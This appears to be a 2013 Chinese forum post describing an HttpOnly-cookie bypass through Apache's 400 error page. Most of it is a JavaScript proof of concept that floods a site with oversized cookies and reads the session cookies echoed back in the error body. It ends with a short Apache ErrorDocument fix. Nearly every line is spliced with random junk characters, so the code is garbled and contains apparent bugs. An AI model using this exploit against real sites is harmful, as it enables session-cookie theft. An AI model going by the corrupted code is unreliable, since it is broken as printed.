很多程序以及一些商业或者成熟开源的cms文章系统为了防止xss盗取用户cookie的问题,一般都采用给cookie加上httponly的属性,来禁止直接使用js得到用户的cookie,从而降低xss的危害,而这个问题刚好可以用来绕过cookie的这个httponly的属性。
4 r1 V1 x" s5 w" g2 b1 V2 G
: r7 t) l! S) b3 o& W' O用chrome打开一个站点,F12打开开发者工具,找到console输入如下代码并回车:
) n3 M! n! [" K- `' } * p* u( s+ j) O. P& d$ o' x
4 w- u Y* ]4 g3 y [) Z- t, S; H
// http://www.exploit-db.com/exploits/18442/! @! b$ ^- J$ H( q
function setCookies (good) {
1 E x: H9 |) o' e& }+ K6 o0 E1 ?// Construct string for cookie value
& B4 v& f; S% bvar str = "";
& K! q3 l! K$ x4 tfor (var i=0; i< 819; i++) {
q( y( g1 Z) U4 W- m7 dstr += "x";$ u+ G& d; }; O, S1 L4 \/ j) Z
}
6 y" O( R1 i0 p" m1 S// Set cookies' S. j2 j. {: T, d# {
for (i = 0; i < 10; i++) {3 a+ C& A8 l$ Q U1 I5 ^
// Expire evil cookie" X' B( E# @9 n
if (good) {
9 O T( X! a1 A# i2 _var cookie = "xss"+i+"=;expires="+new Date(+new Date()-1).toUTCString()+"; path=/;";
5 k" S7 S6 u; Z! _) M b}
( F: r h8 W/ O+ U// Set evil cookie; X8 e$ z. A8 `6 w8 P1 [
else {
$ W* l) k$ \( C6 c5 Dvar cookie = "xss"+i+"="+str+";path=/";9 q' E1 K# ?6 l
}. r& }3 M+ r. m) B
document.cookie = cookie;
' x$ b$ e/ v. n2 T; g& C}
# j9 l$ I1 }. z: j) F}3 d w/ e% K6 R1 |
function makeRequest() {
/ }8 ~& B7 R# e9 y6 S/ C; P# EsetCookies();
6 h! a# M3 p u# v' X, ~function parseCookies () {: |& C/ }+ x1 q7 ~" \7 N& k2 W
var cookie_dict = {};7 V8 M D# j4 y& k6 B! a6 G! t9 I
// Only react on 400 status* H0 Y- D2 e* d% r' R, N7 f
if (xhr.readyState === 4 && xhr.status === 400) {
9 t# O4 f3 x. i/ d// Replace newlines and match <pre> content! A; ~. r6 D2 ]2 r0 v6 \
var content = xhr.responseText.replace(/\r|\n/g,'').match(/<pre>(.+)<\/pre>/);
) {+ c$ D; Y6 pif (content.length) {
; `3 l2 N' ~8 s1 O9 X9 X r// Remove Cookie: prefix5 N7 M" _+ U3 b; _6 q. l& }& s& \
content = content[1].replace("Cookie: ", "");
6 o0 V# o& P1 y! v8 Q6 Evar cookies = content.replace(/xss\d=x+;?/g, '').split(/;/g);
) i9 o" J' ^% _! |, S& ^// Add cookies to object. _5 T+ U' o9 H6 m. O
for (var i=0; i<cookies.length; i++) {. P5 @- @8 p/ a5 W+ s: C
var s_c = cookies.split('=',2);
3 f' J& }/ H* P Ucookie_dict[s_c[0]] = s_c[1];
- ]$ L+ F1 L" N$ K' @3 _; Z}5 q H: @0 n" v9 }, S/ B
}
9 ^9 v, b( W! i// Unset malicious cookies3 J5 k5 _' A4 q7 b+ ?) Z
setCookies(true);
6 X6 _7 j( B( x' ]7 }, Falert(JSON.stringify(cookie_dict));1 l. }3 g) B$ r! q
}
3 v, k) ?6 M9 C- a}4 t9 j) b( W# O$ f: V& m2 X6 l
// Make XHR request& B2 Q8 K5 R& V6 M$ S# y+ o
var xhr = new XMLHttpRequest();
4 F! }- W; t& r( w4 axhr.onreadystatechange = parseCookies;
2 H9 ~) b$ [5 t9 X4 }7 rxhr.open("GET", "/", true);' C& J3 Z3 Z( F" ~/ G q5 J$ e
xhr.send(null);
5 Q) Z+ J& \& @* A; k7 J}
* V% K$ d) r3 }) U4 FmakeRequest();
( e. ]9 W9 F/ |+ `$ Z$ [: U4 X/ }5 W6 Y9 G0 ~
你就能看见华丽丽的400错误包含着cookie信息。
* s; R; N4 |8 a9 o; C' Z
# B! ]6 l( r- j! Z5 `下载地址:https://gist.github.com/pilate/1955a1c28324d4724b7b/download#% H1 N. _# N3 }! U6 W
4 A! [4 o7 C2 S% ^2 q) u/ h修复方案:
/ I1 Q% S) ~( Y/ `2 f* B" V: V* O" A3 e( i7 c! A
Apache官方提供4种错误处理方式(http://httpd.apache.org/docs/2.0/mod/core.html#errordocument),如下
9 ?+ V _* i( o/ `5 n6 E
, O- U2 Z- {" xIn the event of a problem or error, Apachecan be configured to do one of four things,, c( G, w% U$ O% d' ]. b
2 I+ y) z8 G9 v% t* j" Y; t2 d: U1. output asimple hardcoded error message输出一个简单生硬的错误代码信息7 Y6 t( y% o% }# T. F
2. output acustomized message输出一段信息
3 V$ k% d" M! O* z; z3 W8 h3. redirect to alocal URL-path to handle the problem/error转向一个本地的自定义页面 9 Z/ E3 y7 w1 ]' A
4. redirect to an external URL to handle theproblem/error转向一个外部URL" L$ ]( o1 v a' r/ g+ K8 h/ e. s
6 g; ?: ?) O+ A; p' Q- O经测试,对于400错误只有方法2有效,返回包不会再包含cookie内容
' C" X G' R" f" k5 a2 Z) W S# H6 F: @9 O8 N- |6 e! |5 ^4 _( o
Apache配置:& s1 j8 [3 d+ t8 S
3 c) G0 G6 E, a$ P, N q7 zErrorDocument400 " security test"6 O2 [9 C! y( r. n
' p. |( H% P& p+ z' X
当然,升级apache到最新也可:)。 I3 S: e3 j% O. J
% f; U; i9 y1 G, ]5 ~参考:http://httpd.apache.org/security/vulnerabilities_22.html
# \! D' e! y0 m% d5 ~: M7 a& M5 H- N, I) g7 y; h6 y/ V# a
|
发表于 2013-4-19 19:15:43
收藏
支持
反对